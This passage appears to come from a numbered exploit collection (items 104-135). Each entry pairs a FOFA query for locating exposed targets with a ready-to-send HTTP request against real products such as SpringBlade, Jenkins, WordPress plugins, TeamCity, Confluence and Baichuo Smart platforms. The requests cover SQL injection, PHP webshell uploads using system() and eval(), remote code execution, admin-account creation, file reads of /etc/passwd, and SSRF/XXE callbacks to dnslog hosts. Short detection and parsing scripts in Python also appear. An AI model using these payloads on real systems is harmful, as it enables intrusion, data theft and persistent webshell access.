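_PARAMETER_ENTITY = re.compile(r"<!ENTITY\s+%", re.I)


def decode_saml_request(value):
    """Return the XML carried by a SAMLRequest parameter.

    The POST binding (used in the request above) carries plain base64.  The
    Redirect binding carries raw-deflated XML inside the base64, so when the
    decoded bytes do not look like XML we try to inflate them (wbits=-15 is
    raw deflate, no zlib header).
    """
    value = unquote(value.strip())
    value += "=" * (-len(value) % 4)          # tolerate stripped padding
    raw = base64.b64decode(value)
    if not raw.lstrip(b"\xef\xbb\xbf \t\r\n").startswith(b"<"):
        try:
            raw = zlib.decompress(raw, -15)
        except zlib.error:
            pass                              # neither XML nor deflate; return as-is
    return raw.decode("utf-8", errors="replace")


def saml_request_xxe_indicators(value):
    """List why a SAMLRequest looks like an XXE attempt; [] means nothing found."""
    xml = decode_saml_request(value)
    reasons = []
    if _DOCTYPE.search(xml):
        reasons.append("inline DOCTYPE")       # a real AuthnRequest never carries a DTD
    if _EXTERNAL_ENTITY.search(xml):
        reasons.append("external entity")      # SYSTEM/PUBLIC id => out-of-band fetch
    if _PARAMETER_ENTITY.search(xml):
        reasons.append("parameter entity")     # the '% name' form used above
    return reasons


def encode_post_binding(xml):
    """POST-binding form: plain base64 of the XML (what the request above uses)."""
    return base64.b64encode(xml.encode("utf-8")).decode("ascii")


def encode_redirect_binding(xml):
    """Redirect-binding form: raw deflate, then base64.  Included so the decoder
    can be exercised against both encodings."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    data = comp.compress(xml.encode("utf-8")) + comp.flush()
    return base64.b64encode(data).decode("ascii")


if __name__ == "__main__":
    print(decode_saml_request(CAPTURED_SAML_REQUEST))
    print(saml_request_xxe_indicators(CAPTURED_SAML_REQUEST))
```

Run it over the SAMLRequest field of requests to /dana-na/auth/saml-sso.cgi (or any SAML ACS endpoint); a legitimate service provider never needs a DTD in an AuthnRequest, so "inline DOCTYPE" alone is already worth an alert.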


104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account&realName&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


Response to the download request (excerpt); lines of /etc/passwd are reflected in the error message and in the help text:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help

Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
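Added example (mine; not Jenkins' code and not from the original post): build and parse the framed upload body shown above. The frame layout (a 4-byte big-endian payload length that does not count the opcode byte, one opcode byte, then a Java writeUTF string) is my reading of that byte string; the opcode names ARG/LOCALE/ENCODING/START are taken from Jenkins' PlainCLIProtocol.Op enum as I read it and should be treated as an assumption. file_expansion_args() picks out the "@path" arguments that the args4j parser expands into file contents, which is the behaviour CVE-2024-23897 abuses; it is what you would run over a captured /cli?remoting=false upload body.

```python
import struct

# Opcode numbers as they appear in the frames above. The names follow Jenkins'
# PlainCLIProtocol.Op enum as I read it (assumption, not stated on the page).
OPS = {0: "ARG", 1: "LOCALE", 2: "ENCODING", 3: "START"}
OP_BY_NAME = {name: num for num, name in OPS.items()}

# The upload body shown on the page, copied as a bytes literal.
PAGE_UPLOAD = (
    b"\x00\x00\x00\x06\x00\x00\x04help"
    b"\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
    b"\x00\x00\x00\x05\x02\x00\x03GBK"
    b"\x00\x00\x00\x07\x01\x00\x05en_US"
    b"\x00\x00\x00\x00\x03"
)


def _utf(text):
    # Java DataOutputStream.writeUTF: uint16 BE byte length + UTF-8 bytes
    # (Java's "modified UTF-8" agrees with UTF-8 for the ASCII used here).
    data = text.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def _frame(op, payload=b""):
    # int32 BE payload length (opcode byte NOT counted), opcode byte, payload
    return struct.pack(">IB", len(payload), OP_BY_NAME[op]) + payload


def build_cli_upload(args, encoding="UTF-8", locale="en_US"):
    """Serialise a CLI invocation the way the 'Side: upload' request does."""
    body = b"".join(_frame("ARG", _utf(a)) for a in args)
    body += _frame("ENCODING", _utf(encoding))
    body += _frame("LOCALE", _utf(locale))
    body += _frame("START")
    return body


def parse_cli_upload(data):
    """Inverse of build_cli_upload: return a list of (op_name, value) frames."""
    frames = []
    pos = 0
    while pos + 5 <= len(data):
        length, op = struct.unpack_from(">IB", data, pos)
        pos += 5
        payload = data[pos:pos + length]
        if len(payload) != length:
            raise ValueError("truncated frame at offset %d" % pos)
        pos += length
        name = OPS.get(op, "OP%d" % op)
        if length >= 2:                      # writeUTF string payload
            (n,) = struct.unpack_from(">H", payload, 0)
            value = payload[2:2 + n].decode("utf-8", errors="replace")
        else:                                # e.g. START carries no payload
            value = None
        frames.append((name, value))
    return frames


def file_expansion_args(data):
    """ARG values starting with '@': args4j replaces these with the named file's
    contents, which is what turns a harmless 'help' into a file read here."""
    return [v for name, v in parse_cli_upload(data)
            if name == "ARG" and v is not None and v.startswith("@")]


if __name__ == "__main__":
    print(parse_cli_upload(PAGE_UPLOAD))
    print(file_expansion_args(PAGE_UPLOAD))
```

A WAF or proxy rule cannot rely on the command name, since "help", "connect-node" and others all accept the expanded argument; matching on an ARG frame whose string begins with "@" is the robust signal, and the parser above is how to get at it in a binary body.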


110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: fetch the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
"postId": "1",
"nonce": "<value obtained in step 1>",
"element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
      "useQueryEditor": true,
      "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
      "objectType": "post"
      }
    }
}
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
Affected versions: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Beijing Baichuo (北京百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Baichuo (北京百绰) Smart S20 management platform sysmanageajax.php authenticated SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://x.x.x.x:8443
Referer: https://x.x.x.x:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo (北京百绰) Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


Uploaded file path: /upload/2.php

121. Beijing Baichuo (北京百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328


Uploaded file path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo (北京百绰) Smart S200 management platform importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter carries a base64-encoded SQL statement; c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= decodes to: select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close


123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))


124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>


Then access: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc


Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!


Once the user has been created, log in to the admin console directly; system commands can be executed from there.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--



128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018 update 17 and earlier, 2021 update 7 and earlier, and 2023 update 1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close


Step 2: read /etc/passwd (the uuid header carries the value obtained in step 1)
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9


130. Laykefu customer-service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--


131. Mini-Tmall <= 20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}


CVE-2024-27199 (path traversal variants):
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp


CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--



134. Netentsec (网康) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}


135. Netentsec (网康) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
